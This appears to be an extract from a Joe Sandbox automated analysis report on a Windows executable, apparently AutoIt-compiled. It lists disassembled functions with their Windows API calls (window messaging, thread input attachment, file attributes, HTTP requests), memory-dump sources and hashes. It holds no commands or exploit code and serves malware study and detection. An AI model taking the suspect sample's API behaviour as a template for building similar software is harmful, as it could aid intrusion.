                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 002329DA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4b8a4b8a7addda79c4d8b17d15b132a6935217141e5c65483ad4fdee7dd81c5f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 77e1e3d055a51b78e71b76879880683d013bbf4160b449f857384620c68f3dd9
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b8a4b8a7addda79c4d8b17d15b132a6935217141e5c65483ad4fdee7dd81c5f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69219FB5E10218FBCF01AFA0DC89EEEBBB9EF15300F104156F952A72A1DB755819DB60
                                                                                                                                                                                                                                                                                                                            Function 002644BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00264539
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0026453C
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00264563
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00264586
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002645FE
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00264648
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00264663
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0026467E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00264692
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 002646AF
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 527fabb86e16cb1b9b6c5e7bf4404b2341cdfb51c9e82ac0b7b1b9150443f49b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 94a5faced9369ab61168633a4b978299842e3fba025e7ae80e9d7f6deafffbaf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 527fabb86e16cb1b9b6c5e7bf4404b2341cdfb51c9e82ac0b7b1b9150443f49b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96619E75A00209EFDB10DFA8CC81EEE77B8EF0A710F10415AFA44E72A1D774A999DB50
                                                                                                                                                                                                                                                                                                                            Function 0023BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0023BB18
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BB2C
                                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0023BB33
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BB42
                                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0023BB54
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BB6D
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BB7F
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BBC4
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BBD9
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0023ABA8,?,00000001), ref: 0023BBE4
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2f2e7586a9019fea963464b0d529b6122fa88be17c8c6fd824ebb2e131e32446
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 06691d5dc6d95571700d4ff3a2b14068362140b86812e7e34a9a225e2082fa73
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f2e7586a9019fea963464b0d529b6122fa88be17c8c6fd824ebb2e131e32446
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 573180B5A14209AFDB16AF14FC8CF79F7AAAB4571AF208005FF05D61A4DBF4D8409B21
                                                                                                                                                                                                                                                                                                                            Function 001D2AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001D2AF9
                                                                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 001D2B98
                                                                                                                                                                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 001D2D7D
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00213A1B
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00213A80
                                                                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00213AAD
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                                            • String ID: close all
                                                                                                                                                                                                                                                                                                                            • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 7071118f954bfe7dfa1f5bfa20edb2176a0c83d7fb863e39811b12a7e91ccefc
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 658f3aab44968ead661c74b7cbcd93c7682cf6a72fd194fda064055be364d0c8
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7071118f954bfe7dfa1f5bfa20edb2176a0c83d7fb863e39811b12a7e91ccefc
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58D19131715212CFCB29EF54C489A69F7A5BF24714F1142AEE55A6B352CB30EE62CF40
                                                                                                                                                                                                                                                                                                                            Function 00248835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002489F2
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00248A06
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00248A30
                                                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00248A4A
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00248A5C
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00248AA5
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00248AF5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0b0aa34982f2e0a561ef975b3213e030f6ca81a6d947c5abaeb4abca1fb1fb75
                                                                                                                                                                                                                                                                                                                            • Instruction ID: e2fb06c8c1194db178e1bde034a143f099768fa81feca29661ae67cd2dec2b70
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b0aa34982f2e0a561ef975b3213e030f6ca81a6d947c5abaeb4abca1fb1fb75
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F81AE729386069BCB28EF14C444ABEB3E8BF98310F544C1AF985DB350DB74D9558B92
                                                                                                                                                                                                                                                                                                                            Function 002688F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00268992
                                                                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0026899E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00268A79
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00268AAC
                                                                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,00000000), ref: 00268AE4
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 00268B06
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00268B1E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 4072528602-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d3a4ebb76fb938b1d4f70c1ba7b9afd0076a3de8ccf2b703c035f327dd49eee0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 58700e8d732dbf63b80a94880b0f4d495046d2629d45c88f8b1adb0cc815a4e4
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3a4ebb76fb938b1d4f70c1ba7b9afd0076a3de8ccf2b703c035f327dd49eee0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A71B074611206AFEB21DF94C884FBABBB9FF09300F14465AE845A7361CB71ADE4CB51
                                                                                                                                                                                                                                                                                                                            Function 001D7447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 001D74D7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7567: GetClientRect.USER32(?,?), ref: 001D758D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7567: GetWindowRect.USER32(?,?), ref: 001D75CE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7567: ScreenToClient.USER32(?,?), ref: 001D75F6
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32 ref: 00216083
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00216096
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002160A4
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002160B9
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 002160C1
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00216152
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 916b3d2618c830c2b7faebc555abb378aeb803c742d23a9293c34a85fc18a876
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8de3d073b2a364f30fbc51c4d66380ecdd53e8c115a88e825b461e63aef35f32
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 916b3d2618c830c2b7faebc555abb378aeb803c742d23a9293c34a85fc18a876
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E771C330510206EFCF268F64D888AEE7BF5FF69311F24426AED59562A6D73188A0DF50
                                                                                                                                                                                                                                                                                                                            Function 0024CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0024CCB7
                                                                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0024CCDF
                                                                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0024CD0F
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0024CD67
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 0024CD7B
                                                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0024CD86
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 89e51f4bb93f038837b66557f42abf0c4ba57d2d6fe473335e5364eccadc86fe
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2b9d946b1d7ea95a00e37527fba91d43511d1fed0ab83e58b1bb7433dce70ee1
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89e51f4bb93f038837b66557f42abf0c4ba57d2d6fe473335e5364eccadc86fe
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3631C271A11208EFD765AF69DC88AAB7BFCEB49B40B20452EF446D3200D770DD149B61
                                                                                                                                                                                                                                                                                                                            Function 0023A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002155AE,?,?,Bad directive syntax error,0026DCD0,00000000,00000010,?,?), ref: 0023A236
                                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,002155AE,?), ref: 0023A23D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0023A301
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                                                            • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                                                            • Opcode ID: abaf420cb30afcabef924790d4d8d75e36d0fefd493385a035ba4510c5dbda54
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b2eb98d55e2f2f7ba798e4ea5c88a7e6434322980eedcbc7bdb4acf83e78b561
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abaf420cb30afcabef924790d4d8d75e36d0fefd493385a035ba4510c5dbda54
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A21857192421EFFCF01AF90CC4AEEE7779BF28300F04446AF506651A2D7759568DB11
                                                                                                                                                                                                                                                                                                                            Function 002329EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 002329F8
                                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00232A0D
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00232A9A
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                                            • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 89c0b62b22a00afaa3d1a3498eb199f2d9a618003a9be4ad95edba97b65db694
                                                                                                                                                                                                                                                                                                                            • Instruction ID: e72ee92394dc8ac8cafd3cb7c710e9ecf0104c54cdcbd5087df9d11117ba59c6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89c0b62b22a00afaa3d1a3498eb199f2d9a618003a9be4ad95edba97b65db694
